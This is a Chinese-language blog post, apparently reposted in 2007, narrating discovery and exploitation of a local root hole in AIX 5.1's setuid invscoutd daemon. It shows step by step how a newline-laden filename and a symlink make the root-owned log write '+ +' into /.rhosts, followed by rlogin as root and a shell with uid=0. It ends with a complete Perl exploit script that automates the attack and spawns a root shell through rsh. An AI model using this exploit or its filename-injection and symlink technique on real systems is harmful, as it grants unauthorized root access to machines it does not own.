发现病毒?AIX捉虫记之——invscoutd

发表于:2007-07-04来源:作者:点击数: 标签:
平台信息: -bash-2.05b oslevel 5.1.0.0 -bash-2.05b oslevel -r 5100-01 按八字排列今天应该考查invscou td 命令了 -bash-2.05b ls -l /usr/sbin/invscoutd -r-sr-xr-x 1 root system 217868 Aug 03 2001 /usr/sbin/invscoutd -bash-2.05bman invscoutd …

  平台信息:
  -bash-2.05b$ oslevel
  5.1.0.0
  -bash-2.05b$ oslevel -r
  5100-01
  
  按八字排列今天应该考查invscoutd命令了
  -bash-2.05b$ ls -l /usr/sbin/invscoutd
  -r-sr-xr-x 1 root system 217868 Aug 03 2001 /usr/sbin/invscoutd
  
  -bash-2.05b$man invscoutd
  …………
  The invscoutd command implements a permanent Inventory Scout server daemon on
  one machine in a user's local.network. The usual client is a Java applet running
  in the user's Web browser, which was downloaded from a central Inventory Scout
  CGI application.
  …………
  
  再来看看这个命令的长相:
  -bash-2.05b$ invscoutd
  invscoutd: Missing log file name.
  Inventory Scout Daemon 2.0.2. @@@ CAT VERSION @@@
  USAGE: invscoutd [options] logfile <-- 还写日志文件的说。
  logfile Append status and err msgs. '-' means write to stderr.
  -o Overwrite preexisting log file instead of append. <-- 还可以覆盖已有文件的说
  -pN Change port number to N from default 808. <-- 默认监听在808端口
  -bN Change read buffer size to N from default 1024.
  -dN Change max logic db file size to N from default 50000.
  -tN Change timeout period to N seconds from default 30 seconds.
  -vN Change verbosity level to N from default 18, <--支持交互级别,级别越高记录信息应该越详细
  25=max 20=debug 18=calls 15=banner 10=errs 5=fatal 0=none.
  
  依稀记得以前Unix上有不少漏洞和日志文件权限处理不正确有关,就先考查一下他的这个日志文件吧
  
  
  -bash-2.05b$ ls -l /tmp/bb
  ls: 0653-341 The file /tmp/bb does not exist.
  
  -bash-2.05b$ invscoutd /tmp/bb
  Inventory Scout Version 1.3.0.0
  Logic Database Version 1.3.0.0
  Start invscoutd 2.0.2:
  p=808 u=0 v=18 t=30 d=50000 pid=17028
  flog=/tmp/bb
  -bash-2.05b$ ls -l /tmp/bb
  -rw-r--r-- 1 root staff 270 May 03 03:54 /tmp/bb
  
  哇噻~~,权限果然有问题!!日志文件是root所有的说!!
  
  -bash-2.05b$ id
  uid=203(cloud) gid=1(staff)
  
  看来没错,是个漏洞,那我能利用这个漏洞做什么呢??
  想想……
  
  至少可以把系统重要配置文件破坏掉吧,哈哈……
  
  再想想对于不存在的重要文件如/.rhosts文件(其实暂时也就想到这么一个文件),我们可以用这个漏洞创建这个文件,要是之前执行一次umask 000
  创建的文件我们就有修改权限了 ^_^
  
  这样我们就可以任意改写文件内容了,如:/.rhosts中加一行
  + +
  
  可惜r系列服务使用.rhosts时会对文件属性进行检查:
  如果文件不属于对应用户,或文件权限 除所有者外其他用户或同组用户有写权限均验证失败!
  
  看来通过创建一个我们可写的/.rhosts文件来获得root权限是行不通了~~
  
  我们覆盖重要文件如/etc/passwd,并不能改变文件权限~~
  
  回头再一琢磨,我们不就是要想控制写入文件的内容吗?不能通过直接获得文件写权限自由写内容,那就间接点,要是日志文件写入内容我们可以控制那不也能通过修改/.rhosts,/etc/passwd,/var/spool/cron/crontabs/root 等文件把自己变为root了吗?
  
  赶紧来看看日志文件里写了什么内容:
  -bash-2.05b$ cat /tmp/bb
  2003/05/03 03:54:37 G16716:invscoutd_2.0.2 Inventory Scout Version 1.3.0.0
  2003/05/03 03:54:37 G16716:invscoutd_2.0.2 Logic Database Version 1.3.0.0
  2003/05/03 03:54:37 P17028:invscoutd_2.0.2 Start invscoutd 2.0.2:
  p=808 u=0 v=18 t=30 d=50000 pid=17028
  flog=/tmp/bb
  
  里面好像就flog=/tmp/bb和输入有关。
  
  再试试,看这个问题能不能重现.
  
  -bash-2.05b$ invscoutd ./aa
  Inventory Scout Version 1.3.0.0
  Logic Database Version 1.3.0.0
  Exit code 2, pid 536968056.
  
  看来还得先杀掉老的进程才能再试。
  
  -bash-2.05b$ ps -ef |grep invs
  cloud 15526 1 0 04:36:25 pts/0 0:00 invscoutd ./aa
  cloud 16068 16836 1 04:37:50 pts/0 0:00 grep invs
  -bash-2.05b$ kill -9 15526
  
  看看刚才出错记录到log文件了没?
  -bash-2.05b$ ls -l ./aa
  ls: 0653-341 The file ./aa does not exist.
  
  没有的说。
  
  
  我再试试,我非要重现一次才放心.
  -bash-2.05b$ invscoutd ./aa
  Inventory Scout Version 1.3.0.0
  Logic Database Version 1.3.0.0
  Start invscoutd 2.0.2:
  p=808 u=0 v=18 t=30 d=50000 pid=15526
  flog=./aa
  
  -bash-2.05b$ ls -l ./aa
  ls: 0653-341 The file ./aa does not exist.
  咦,为什么没有记进来?难道文件名还必须以/打头?,先不管了,就写到/tmp下吧,再试试。
  
  这次学乖了,先杀掉进程。
  -bash-2.05b$ ps -ef |grep invsc
  cloud 14194 15338 3 03:55:29 pts/0 0:00 grep invsc
  cloud 17028 1 0 03:54:37 pts/0 0:00 invscoutd ./aa
  -bash-2.05b$ kill -9 17028
  
  …………
  
  经测试,果然能重现,放心了~~
  
  想了想,要通过改写.rhosts ,passwd,crotable突破系统权限取得root特权,都必须要能完整的控制一行写入文件的内容,日志中能控制的是:flog=输入文件名部分,那面文件名中带换行符就可以控制一行的内容了,如:aaaa\n完整的一行\naaaa这种形似的文件名。
  
  但命令行上一时想不起来如何输入\n字符并把它作为命令行的一个参数,刚好以前学的perl派上了用场 ^_*用perl来执行一个系统命令invscoutd "/tmp/bbbbb\n+ +\nddd",看看能不能产生一个单独的一行记录内容+ +
  
  -bash-2.05b$ perl -e 'system invscoutd,"/tmp/bbbbb\n+ +\nddd";'
  Inventory Scout Version 1.3.0.0
  Logic Database Version 1.3.0.0
  Start invscoutd 2.0.2:
  p=808 u=0 v=18 t=30 d=50000 pid=16282
  flog=/tmp/bbbbb
  + +
  ddd
  -bash-2.05b$ cat /tmp/bbbbb*
  2003/05/03 03:59:09 G14204:invscoutd_2.0.2 Inventory Scout Version 1.3.0.0
  2003/05/03 03:59:09 G14204:invscoutd_2.0.2 Logic Database Version 1.3.0.0
  2003/05/03 03:59:09 G14204:invscoutd_2.0.2 Bind error, port 808: The socket name is already in use..
  2003/05/03 03:59:09 G14204:invscoutd_2.0.2 Exit code 2, pid 536968072.
  2003/05/03 03:59:27 G14934:invscoutd_2.0.2 Inventory Scout Version 1.3.0.0
  2003/05/03 03:59:27 G14934:invscoutd_2.0.2 Logic Database Version 1.3.0.0
  2003/05/03 03:59:27 P16282:invscoutd_2.0.2 Start invscoutd 2.0.2:
  p=808 u=0 v=18 t=30 d=50000 pid=16282
  flog=/tmp/bbbbb
  + +
  ddd
  
  嘿嘿,可以的说!!
  
  -bash-2.05b$ ls -l /tmp/bbbbb*
  -rw-r--r-- 1 root staff 602 May 03 03:59 /tmp/bbbbb
  + +
  ddd
  
  那我们如何写"\n+ +\n"内容到/.rhosts呢?
  
  
  想想……
  
  再想想……
  
  呵呵,我想到了,你想到了吗?
  
  再给你5分钟,好好想想~~
  
  如果直接执行invscoutd /.rhosts
  肯定不行,里面不会有我们期望的
  + +
  行。
  
  如果我们执行perl -e 'system invscoutd,"/tmp/bbbbb\n+ +\nddd";'
  向log文件写入
  + +
  成功,
  
  但写入的文件是"/tmp/bbbbb\n+ +\nddd",而我们现在期望是写到/.rhosts文件,再想想…………
  
  归纳一下,问题核心是想把A文件名写入B文件中,Unix下的符号链接好像就是这个桥梁耶~
  
  我们建立一个A -> B的符号连接不就行了!
  ln -s B A
  然后
  invscoutd A
  应该就成了。
  
  开始行动:
  
  -bash-2.05b$ ls -l /.rhosts
  ls: 0653-341 The file /.rhosts does not exist.
  
  建立A -> B的符号链接:
  -bash-2.05b$ perl -e 'symlink "/.rhosts","/tmp/cc\n+ +\ndd";'
  这里B是"/.rhosts"
  A是"/tmp/cc\n+ +\ndd"
  
  -bash-2.05b$ ls -l /tmp/cc*
  lrwxrwxrwx 1 cloud staff 8 May 03 04:02 /tmp/cc
  + +
  dd -> /.rhosts
  
  来,执行之
  
  -bash-2.05b$ perl -e 'system invscoutd,"/tmp/cc\n+ +\ndd";'
  Inventory Scout Version 1.3.0.0
  Logic Database Version 1.3.0.0
  Exit code 2, pid 536968072.
  -bash-2.05b$ ps -ef |grep invsc
  cloud 16282 1 0 03:59:27 - 0:00 invscoutd /tmp/bbbbb?+ +?ddd
  cloud 17146 15338 1 04:03:40 pts/0 0:00 grep invsc
  -bash-2.05b$ kill -9 16282
  -bash-2.05b$ perl -e 'system invscoutd,"/tmp/cc\n+ +\ndd";'
  Inventory Scout Version 1.3.0.0
  Logic Database Version 1.3.0.0
  Start invscoutd 2.0.2:
  p=808 u=0 v=18 t=30 d=50000 pid=17150
  flog=/tmp/cc
  + +
  dd
  
  看看文件生成了没有:
  -bash-2.05b$ ls -l /.rhosts
  -rw-r--r-- 1 root staff 598 May 03 04:03 /.rhosts
  
  ok,来继续看看内容:
  
  -bash-2.05b$ cat /.rhosts
  2003/05/03 04:03:33 G17144:invscoutd_2.0.2 Inventory Scout Version 1.3.0.0
  2003/05/03 04:03:33 G17144:invscoutd_2.0.2 Logic Database Version 1.3.0.0
  2003/05/03 04:03:33 G17144:invscoutd_2.0.2 Bind error, port 808: The socket name is already in use..
  2003/05/03 04:03:33 G17144:invscoutd_2.0.2 Exit code 2, pid 536968072.
  2003/05/03 04:03:48 G14270:invscoutd_2.0.2 Inventory Scout Version 1.3.0.0
  2003/05/03 04:03:48 G14270:invscoutd_2.0.2 Logic Database Version 1.3.0.0
  2003/05/03 04:03:48 P17150:invscoutd_2.0.2 Start invscoutd 2.0.2:
  p=808 u=0 v=18 t=30 d=50000 pid=17150
  flog=/tmp/cc
  + +
  dd
  
  
  呵呵+ +写进去了!!!
  
  来,用root用户 rlogin localhost登陆系统,这样就能取得root权限了:
  
  -bash-2.05b$ rlogin -l root localhost
  usage: rlogin host [ -ex ] [ -l username ] [-f|-F] [-k realm] [ -8 ]
  
  faint ! 一高兴起来就连命令格式都给忘了 
  
  再来:
  
  -bash-2.05b$ rlogin localhost -l root
  *******************************************************************************
  * *
  * *
  * Welcome to AIX Version 5.1! *
  * *
  * *
  * Please see the README file in /usr/lpp/bos for information pertinent to *
  * this release of the AIX Operating System. *
  * *
  * *
  *******************************************************************************
  …………
  
  -bash-2.05b# <--好爽的特权"#"提示附耶!
  -bash-2.05b# id
  uid=0(root) gid=0(system) groups=2(bin),3(sys),7(security),8(cron),10(audit),11(lp)
  
  
  哈哈哈~~搞定啦~~偶麻雀变root啦~~
  学了这么多年的Unix知识终于没白学呀~~
  热泪盈框ing ……
  
  继续感动ing……
  
  ◎!#◎%¥#%,还在陶醉~~! ! !
  
  好啦~好啦~自恋狂!该干活啦~~
  
  简单清理战场~
  -bash-2.05b# rm /.rhosts
  -bash-2.05b# rm /tmp/bb* /tmp/cc*
  -bash-2.05b# ps -ef |grep invsc
  cloud 14306 15338 1 04:05:51 pts/0 0:00 grep invsc
  cloud 17150 1 0 04:03:48 - 0:00 invscoutd /tmp/cc?+ +?dd
  -bash-2.05b# kill -9 17150
  -bash-2.05b#
  
  后台操作
  $LOG="/tmp/.ex/.hello\n+ +\nworld";
  $CMD="/usr/sbin/invscoutd";
  umask 022;
  mkdir "/tmp/.ex",0777;
  
  print "Exploit error on kill process invscoutd !!" ,exit 1
  if &killproc() == 0;
  
  symlink "/.rhosts",$LOG;
  system $CMD,"-p7321",$LOG; &killproc();
  unlink $LOG;
  print "\n============\nRemember to remove /.rhosts !!\n";
  print "rsh localhost -l root '/bin/sh -i'\n";
  print "waiting . . . . . .\n";
  system "rsh","localhost","-l","root","/bin/sh -i";
  
  system $CMD,"-p808","/dev/null" ; &killproc();
  rmdir "/tmp/.ex";
  
  sub killproc() {
  $_=`ps -ef |grep invscoutd |grep -v grep |grep -v perl`;
  @proc_lst=split;
  $ret=kill 9,$proc_lst[1] if $proc_lst[1];
  $ret=-1 if ! defined $ret;
  return $ret;
  }
  #EOF

原文转自:http://www.ltesting.net